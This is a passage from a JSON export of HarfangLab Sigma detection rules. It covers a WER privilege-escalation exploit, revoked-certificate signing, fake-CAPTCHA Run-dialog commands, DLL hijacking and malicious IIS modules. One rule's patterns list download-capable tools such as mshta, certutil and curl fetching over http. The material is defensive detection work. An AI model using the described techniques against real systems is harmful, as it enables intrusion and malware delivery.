ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0a956b02-3359-4969-9418-cfa7e8279f9e", "rule_name": "WER Service CVE-2023-36874 Vulnerability Exploited", "rule_description": "Detects exploitation of CVE-2023-36874 a vulnerability affecting the Windows Error Reporting (WER) component.\nMicrosoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate as SYSTEM.\nIt is recommended to investigate if the exploitation was successful by looking at integrity level of the process that triggered the alert.\n", "rule_creation_date": "2023-08-24", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1068" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0a95ac1e-214e-4581-b19e-5ba1e9731861", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.088105Z", "creation_date": "2026-03-23T11:45:34.088107Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.088111Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware", "https://attack.mitre.org/techniques/T1553/002/" ], "name": "t1553_002_dicol_effluent_revoked_certificate.yml", "content": "title: Process Executed Signed with Revoked Certificate\nid: 0a95ac1e-214e-4581-b19e-5ba1e9731861\ndescription: |\n Detects the execution of a process signed using a DICOL EFFLUENT revoked certificates.\n Malicious usage of this certificate has already been seen by the threat actor UNC2596.\n It is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\nreferences:\n - https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/09/27\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '3e22bfc34b0718ee1416cc5bf1f7b2b646f5b56a'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0a95ac1e-214e-4581-b19e-5ba1e9731861", "rule_name": "Process Executed Signed with Revoked Certificate", "rule_description": "Detects the execution of a process signed using a DICOL EFFLUENT revoked certificates.\nMalicious usage of this certificate has already been seen by the threat actor UNC2596.\nIt is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\n", "rule_creation_date": "2022-09-27", "rule_modified_date": "2025-01-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1553.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.623495Z", "creation_date": "2026-03-23T11:45:34.623497Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623501Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha", "https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/", "https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/", "https://attack.mitre.org/techniques/T1566/", "https://attack.mitre.org/techniques/T1204/004/" ], "name": "t1204_001_run_command_explorer.yml", "content": "title: Suspicious Process Executed via Run Prompt\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee\ndescription: |\n Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\n In this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\n It is recommended to investigate the entire process chain following any suspicious Run dialog executions.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2024/11/12\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|re: '(?i).*\\|.:\\\\Windows\\\\System32\\\\user32\\.dll!SendMessageW\\+0x[a-f0-9]*$'\n StackTrace|contains:\n - 'CallWindowProcW'\n - 'DispatchMessageW'\n ParentImage|endswith: '\\explorer.exe'\n Image|startswith: '?:\\windows\\'\n # Ensure commandline containes at least a space -> there are some args\n CommandLine|contains: ' '\n\n selection_image:\n - Image:\n - '?:\\Windows\\hh.exe'\n - '?:\\Windows\\System32\\mshta.exe'\n - '?:\\Windows\\SysWOW64\\mshta.exe'\n - '?:\\Windows\\System32\\PresentationHost.exe'\n - '?:\\Windows\\SysWOW64\\PresentationHost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\windows\\system32\\regsvr32.exe'\n - '?:\\windows\\SysWOW64\\regsvr32.exe'\n - '?:\\windows\\system32\\rundll32.exe'\n - '?:\\windows\\SysWOW64\\rundll32.exe'\n CommandLine|contains: 'http'\n\n selection_cmd:\n Image:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n CommandLine|contains:\n - 'mshta'\n - 'PresentationHost'\n - 'powershell'\n - 'msiexec'\n - 'regsvr32'\n - 'rundll32'\n - 'curl'\n - 'certutil'\n\n filter_lnk:\n LnkPath|contains: '?'\n\n exclusion_powershell:\n CommandLine:\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -noprofile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process PowerShell -Verb RunAs'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -File ?:\\\\*\\Scripts\\\\*.ps1'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process notepad.exe *'\n\n exclusion_msiexec:\n CommandLine|startswith: '?:\\Windows\\system32\\msiexec.exe /* \\\\\\\\*.local\\'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee", "rule_name": "Suspicious Process Executed via Run Prompt", "rule_description": "Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\nIn this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\nIt is recommended to investigate the entire process chain following any suspicious Run dialog executions.\n", "rule_creation_date": "2024-11-12", "rule_modified_date": "2026-01-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.initial_access" ], "rule_technique_tags": [ "attack.t1204.004", "attack.t1566" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093337Z", "creation_date": "2026-03-23T11:45:34.093339Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093343Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1053/002/" ], "name": "t1053_002_at_scheduler_enabled.yml", "content": "title: At Jobs Enabled via Launchd\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5\ndescription: |\n Detects the loading of file related to the `at` utility by launchd.\n Adversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/05/10\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/launchctl'\n CommandLine|contains|all:\n - 'load'\n - '/com.apple.atrun.plist'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5", "rule_name": "At Jobs Enabled via Launchd", "rule_description": "Detects the loading of file related to the `at` utility by launchd.\nAdversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\n", "rule_creation_date": "2024-05-10", "rule_modified_date": "2025-01-28", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1053.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.599572Z", "creation_date": "2026-03-23T11:45:34.599576Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.599583Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_cidiag.yml", "content": "title: DLL Hijacking via CIDiag.exe\nid: 0ac5fafe-dc2c-42bf-9d26-3882b0df7857\ndescription: |\n Detects potential Windows DLL Hijacking via CIDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CIDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857", "rule_name": "DLL Hijacking via CIDiag.exe", "rule_description": "Detects potential Windows DLL Hijacking via CIDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618712Z", "creation_date": "2026-03-23T11:45:34.618714Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618718Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_workfolders.yml", "content": "title: DLL Hijacking via workfolders.exe\nid: 0ad1a87e-1efd-47a3-a74b-3ec148f9992a\ndescription: |\n Detects potential Windows DLL Hijacking via workfolders.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'workfolders.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\davclnt.dll'\n - '\\DEVOBJ.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\drprov.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a", "rule_name": "DLL Hijacking via workfolders.exe", "rule_description": "Detects potential Windows DLL Hijacking via workfolders.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.075904Z", "creation_date": "2026-03-23T11:45:34.075906Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.075910Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference", "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://attack.mitre.org/techniques/T1505/004/" ], "name": "t1505_004_iis_module_native_load_pre43.yml", "content": "title: Suspicious IIS Module Loaded\nid: 0ae4376f-360f-4b97-9b3f-4c735a82fbf6\ndescription: |\n Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\n Malicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\n It is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n This rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\nreferences:\n - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference\n - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n - https://attack.mitre.org/techniques/T1505/004/\ndate: 2023/11/20\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.004\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w3wp.exe'\n ProcessDescription: 'IIS Worker Process'\n ImageLoaded|re:\n - '(?i)^[A-Z]:\\\\Windows\\\\System32\\\\inetsrv\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n AgentVersion|lt|version: 4.3 # Before this version, only native DLL are considered, see 29dfc6e6-c42a-4009-8e21-367675f7e417\n\n filter_legitimate_common_modules_bypath:\n ImageLoaded:\n - '?:\\Windows\\System32\\inetsrv\\authanon.dll'\n - '?:\\Windows\\System32\\inetsrv\\authbas.dll'\n - '?:\\Windows\\System32\\inetsrv\\authcert.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmd5.dll'\n - '?:\\Windows\\System32\\inetsrv\\authsspi.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachfile.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachhttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachtokn.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachuri.dll'\n - '?:\\Windows\\System32\\inetsrv\\cgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\compdyn.dll'\n - '?:\\Windows\\System32\\inetsrv\\compstat.dll'\n - '?:\\Windows\\System32\\inetsrv\\custerr.dll'\n - '?:\\Windows\\System32\\inetsrv\\defdoc.dll'\n - '?:\\Windows\\System32\\inetsrv\\diprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\dirlist.dll'\n - '?:\\Windows\\System32\\inetsrv\\filter.dll'\n - '?:\\Windows\\System32\\inetsrv\\gzip.dll'\n - '?:\\Windows\\System32\\inetsrv\\iis_ssi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiscore.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisetw.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfcgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfreb.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisreqs.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisres.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisutil.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiswsock.dll'\n - '?:\\Windows\\System32\\inetsrv\\iprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\isapi.dll'\n - '?:\\Windows\\System32\\inetsrv\\logcust.dll'\n - '?:\\Windows\\System32\\inetsrv\\loghttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\modrqflt.dll'\n - '?:\\Windows\\System32\\inetsrv\\nativerd.dll'\n - '?:\\Windows\\System32\\inetsrv\\protsup.dll'\n - '?:\\Windows\\System32\\inetsrv\\redirect.dll'\n - '?:\\Windows\\System32\\inetsrv\\rewrite.dll'\n - '?:\\Windows\\System32\\inetsrv\\static.dll'\n - '?:\\Windows\\System32\\inetsrv\\validcfg.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3dt.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3tp.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3wphost.dll'\n - '?:\\Windows\\System32\\inetsrv\\warmup.dll'\n - '?:\\Windows\\System32\\inetsrv\\wbhst_pm.dll'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_legitimate_ms_safehtml:\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SafeHtml filter'\n InternalName: 'osafehtm'\n Product:\n - 'Microsoft SafeHtml'\n - '*Exchange - For Testing Purposes Only*'\n ImageLoaded|endswith: '\\osafehtm.dll'\n\n exclusion_legitimate_bo_crystalreports:\n Company: 'Business Objects'\n LegalCopyright|endswith: 'Business Objects'\n Product|startswith: 'Crystal Reports'\n ImageLoaded|endswith:\n - '\\CrystalDecisions.CrystalReports.Engine.dll'\n - '\\CrystalDecisions.ReportSource.dll'\n - '\\CrystalDecisions.Shared.dll'\n - '\\CrystalDecisions.Web.dll'\n\n exclusion_legitimate_ge_healtcare:\n Company: 'GE Healthcare'\n Product|startswith: 'Dicom'\n ImageLoaded|endswith: '\\DicomFileParser.dll'\n\n exclusion_legitimate_infor_mingle:\n Company: 'Infor'\n Description: 'Infor.Mingle Extension Module for IIS'\n ImageLoaded|endswith: '\\Infor.Mingle.IISModule.dll'\n\n exclusion_legitimate_zedoc:\n Company: 'BSV'\n Description|startswith: 'BSV.'\n InternalName|startswith: 'BSV.'\n ImageLoaded|endswith: '\\bin\\BSV.Videocodage.dll'\n\n exclusion_legitimate_mysqladonet:\n Company: 'MySQL AB'\n Description|startswith: 'MySql.'\n InternalName|startswith: 'MySql.'\n LegalCopyright|endswith: ', MySQL AB'\n ImageLoaded|endswith: '\\bin\\MySql.Data.dll'\n\n exclusion_legitimate_stripheaders:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\stripheaders.dll'\n sha256:\n - 'ce3698854f86e1c18f7926d57aec9a6fdba633341a128bec799698e76ef8e144'\n - '16151bbbe127469a0aab8ce7f4f954a2e585201f7d27f8ab7895a62b60f056a9'\n\n exclusion_legitimate_webdav:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\webdav.dll'\n sha256:\n - 'fdddf849ba5c8de2f8df9650ab32578e0e74ed607f741013fa50058206b811bf'\n - '94003c985396df6f422d4ad99651a66aee401f9846ed80f82f66f2db77b3391f'\n - '53b61306ed62687b5aeeb380cda96d8a70641d4f1ab58edc26978a181d7fe1d0'\n - '8e430996c1ec91f8ef6d1b10017ad18eddde3027574cafdeb6e42e90bce516e6'\n\n exclusion_legitimate_freeimage:\n Company: 'FreeImage'\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Soft Gold ltd'\n\n exclusion_legitimate_nicelimited:\n - Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'NICE Systems Ltd'\n - Company: 'NICE Limited'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications legitimately requires the loading of an unsigned library server-wide.\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6", "rule_name": "Suspicious IIS Module Loaded", 